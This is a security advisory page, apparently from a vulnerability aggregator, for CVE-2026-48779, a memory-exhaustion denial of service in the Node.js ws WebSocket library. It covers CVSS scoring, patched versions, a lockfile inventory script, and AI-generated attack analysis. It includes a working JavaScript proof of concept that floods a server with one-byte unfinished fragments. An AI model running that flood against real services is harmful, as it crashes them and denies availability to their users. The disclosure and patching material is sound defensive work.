
ws (Node.js WebSocket) CVE-2026-48779

HIGH
Uncontrolled Resource Consumption (CWE-400)
2026-06-15 https://github.com/websockets/ws GHSA-96hv-2xvq-fx4p
7.5
CVSS 3.1 · GitHub Advisory

Severity by source

GitHub Advisory PRIMARY
7.5 HIGH
AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
vuln.today AI
7.5 HIGH

Remote, unauthenticated peer over a standard WebSocket connection with no user interaction; impact is availability-only (process OOM), no confidentiality or integrity effect.

3.1 AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
4.0 AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

Primary rating from GitHub Advisory.

CVSS Vector (GitHub Advisory)

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope: Unchanged
  • Confidentiality: None
  • Integrity: None
  • Availability: High

Lifecycle Timeline

  • Source Code Evidence Fetched: Jun 15, 2026 - 17:15 (vuln.today)
  • Analysis Generated: Jun 15, 2026 - 17:15 (vuln.today)

Blast Radius

ecosystem impact
† from your stack dependencies † transitive graph · vuln.today resolves 4-path depth
  • 320 npm packages depend on ws (27 direct, 295 indirect)

Ecosystem-wide dependent count for version 1.1.0.

Description (GitHub Advisory)

Impact

A high volume of exceptionally small fragments and data chunks can be sent by a peer, with modest network traffic, to force the remote peer into allocating and holding structural wrappers that consume far more memory than the default documented message-size limit, leading to process termination due to OOM.

Proof of concept

```js
import { WebSocket, WebSocketServer } from 'ws';

const wss = new WebSocketServer({ port: 0 }, function () {
  const data = Buffer.alloc(1);
  const options = { fin: false };
  const { port } = wss.address();
  const ws = new WebSocket(`ws://localhost:${port}`);

  ws.on('open', function () {
    (function send() {
      ws.send(data, options, function (err) {
        if (err) return;
        send();
      });
    })();
  });

  ws.on('error', console.error);
  ws.on('close', function (code, reason) {
    console.log(`client close - code: ${code} reason: ${reason.toString()}`);
  });
});

wss.on('connection', function (ws) {
  ws.on('error', console.error);
  ws.on('close', function (code, reason) {
    console.log(`server close - code: ${code} reason: ${reason.toString()}`);
  });
});
```

Patches

The vulnerability was fixed in ws@8.21.0 (https://github.com/websockets/ws/commit/bca91adf15677e47dbe4f959653452727be28b94) and backported to ws@7.5.11 (https://github.com/websockets/ws/commit/fd36cd864fcdf62a08273a99e19a7d975401fee8), ws@6.2.4 (https://github.com/websockets/ws/commit/86d3e8a5fb0246ed373860c5fbb0de88824a27f7), and ws@5.2.5 (https://github.com/websockets/ws/commit/b5372ac67bb97a773727b8e9f5035a8123556d53).
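
The fixed releases listed above, turned into an inventory check (an added example, not code from the advisory or the ws project): it walks the `packages` map of an npm lockfile (lockfileVersion 2 or 3) and flags every installed copy of ws that predates the fix on its release line. The sample lockfile is constructed, and treating release lines after 8.x as fixed is an assumption.

```javascript
// Added example: inventory check for CVE-2026-48779 (not part of the advisory).
// First fixed release per major line, as listed in the advisory text above.
const FIXED = { 5: [5, 2, 5], 6: [6, 2, 4], 7: [7, 5, 11], 8: [8, 21, 0] };

// Parse "8.17.1" or "v7.5.10-beta.1" into [major, minor, patch]; suffixes are ignored.
function parseVersion(v) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)/.exec(String(v).trim());
  return m ? m.slice(1, 4).map(Number) : null;
}

// true = affected, false = fixed, null = could not parse (review by hand).
function isVulnerable(version) {
  const v = parseVersion(version);
  if (!v) return null;
  if (v[0] < 5) return true; // prior to 5.2.5 and no backport listed for these lines
  if (v[0] > 8) return false; // assumption: lines after 8.x already carry the fix
  const fixed = FIXED[v[0]];
  for (let i = 0; i < 3; i++) {
    if (v[i] !== fixed[i]) return v[i] < fixed[i];
  }
  return false; // exactly the fixed release
}

// Walk the "packages" map of an npm lockfile (lockfileVersion 2 or 3) and
// report every installed copy of ws, direct or nested, that is not fixed.
function findVulnerableWs(lock) {
  const hits = [];
  for (const [path, meta] of Object.entries(lock.packages || {})) {
    if (!/(^|\/)node_modules\/ws$/.test(path)) continue; // skips wsx, @scope/ws
    const verdict = isVulnerable(meta.version);
    if (verdict !== false) {
      hits.push({ path, version: meta.version, status: verdict ? 'vulnerable' : 'review' });
    }
  }
  return hits;
}

// Constructed sample lockfile, for illustration only.
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'demo-app', version: '1.0.0' },
    'node_modules/ws': { version: '8.21.0' },
    'node_modules/old-client/node_modules/ws': { version: '7.5.10' },
    'node_modules/legacy-lib/node_modules/ws': { version: '1.1.0' },
    'node_modules/wsx': { version: '8.0.0' },
  },
};
console.log(findVulnerableWs(SAMPLE_LOCK));
```

Nested copies matter here: a patched top-level ws does not update the copies pinned under other dependencies' own `node_modules` directories.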

Workarounds

In vulnerable versions, the issue can be mitigated by lowering the value of the maxPayload option if possible.

Credits

The vulnerability was responsibly disclosed and fixed by Nadav Magier.

Analysis (AI)

Memory exhaustion denial of service in the npm 'ws' WebSocket library allows a remote unauthenticated peer to crash a Node.js process by streaming many tiny WebSocket fragments that force the receiver to allocate structural wrappers far exceeding the documented maxPayload limit, ultimately triggering an out-of-memory termination. The flaw affects ws versions prior to 5.2.5, 6.2.4, 7.5.11, and 8.21.0, and publicly available exploit code exists in the GitHub Security Advisory GHSA-96hv-2xvq-fx4p.


Attack Chain (AI, derived)

Hypothetical attack flow derived from CVE metadata

  • Recon: Identify Node.js service using ws
  • Delivery: Open WebSocket connection
  • Exploit: Send stream of 1-byte fin:false fragments
  • Install: Server allocates structural wrappers per fragment
  • C2: V8 heap exhausted past maxPayload guard
  • Execute: Node process OOM-killed
  • Impact: Service availability lost

Vulnerability Assessment (AI)

Exploitation: Exploitation requires only that the target expose a 'ws'-based WebSocket endpoint reachable from the attacker over TCP, with default or any maxPayload configuration that does not also cap fragment count or per-connection heap growth - the flaw is independent of message-byte limits because the structural wrappers, not the payload bytes, drive memory growth. …
Risk Assessment: The CVSS 3.1 vector AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H accurately reflects a network-reachable, unauthenticated, low-complexity availability attack with no impact on confidentiality or integrity - a textbook DoS. …
Exploit Scenario: An attacker opens a single WebSocket connection to a vulnerable Node.js service and, using the publicly available PoC from GHSA-96hv-2xvq-fx4p, transmits an unbounded stream of 1-byte fragments with fin:false. The server allocates a structural wrapper per fragment, the V8 heap grows past its limit, and the Node process is killed by the OOM killer or its own heap-size guard, taking down all other tenants of that process.
Remediation: Vendor-released patch: upgrade to ws 8.21.0 on the 8.x line, or apply the backports ws 7.5.11, 6.2.4, or 5.2.5 depending on the branch in use (commits bca91ad, fd36cd8, 86d3e8a, and b5372ac respectively, all referenced from https://github.com/websockets/ws/security/advisories/GHSA-96hv-2xvq-fx4p). …

Recommended Action (AI)

Within 24 hours: Identify all Node.js applications using the ws library and document current deployed versions. …
